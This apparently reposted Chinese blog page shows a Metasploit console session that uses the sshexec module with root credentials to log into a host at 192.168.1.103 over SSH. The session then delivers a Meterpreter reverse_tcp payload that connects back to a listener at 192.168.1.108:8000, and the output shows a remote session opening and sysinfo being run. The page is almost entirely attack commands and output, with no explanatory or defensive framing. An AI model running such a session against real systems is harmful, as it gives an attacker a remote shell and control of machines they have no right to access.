您的位置:首页 > 编程语言 > ASP

metasploit - sshexec

2015-08-15 10:38 507 查看
msf exploit(sshexec) > show options

Module options (exploit/multi/ssh/sshexec):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
PASSWORD  password         yes       The password to authenticate with.
RHOST     192.168.1.103    yes       The target address
RPORT     22               yes       The target port
USERNAME  root             yes       The user to authenticate as.

Payload options (linux/x86/meterpreter/reverse_tcp):

Name          Current Setting  Required  Description
----          ---------------  --------  -----------
DebugOptions  0                no        Debugging options for POSIX meterpreter
LHOST         192.168.1.108    yes       The listen address
LPORT         8000             yes       The listen port

Exploit target:

Id  Name
--  ----
0   Linux x86

msf exploit(sshexec) > run

[*] Started reverse handler on 192.168.1.108:8000
[*] 192.168.1.103:22 - Sending stager...
[*] Command Stager progress -  39.02% done (272/697 bytes)
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495598 bytes) to 192.168.1.103
[*] Command Stager progress - 100.00% done (697/697 bytes)
[*] Meterpreter session 1 opened (192.168.1.108:8000 -> 192.168.1.103:57760) at 2015-08-15 02:36:40 +0000

meterpreter > sysinfo
Computer     : kali
OS           : Linux kali 3.14-kali1-686-pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: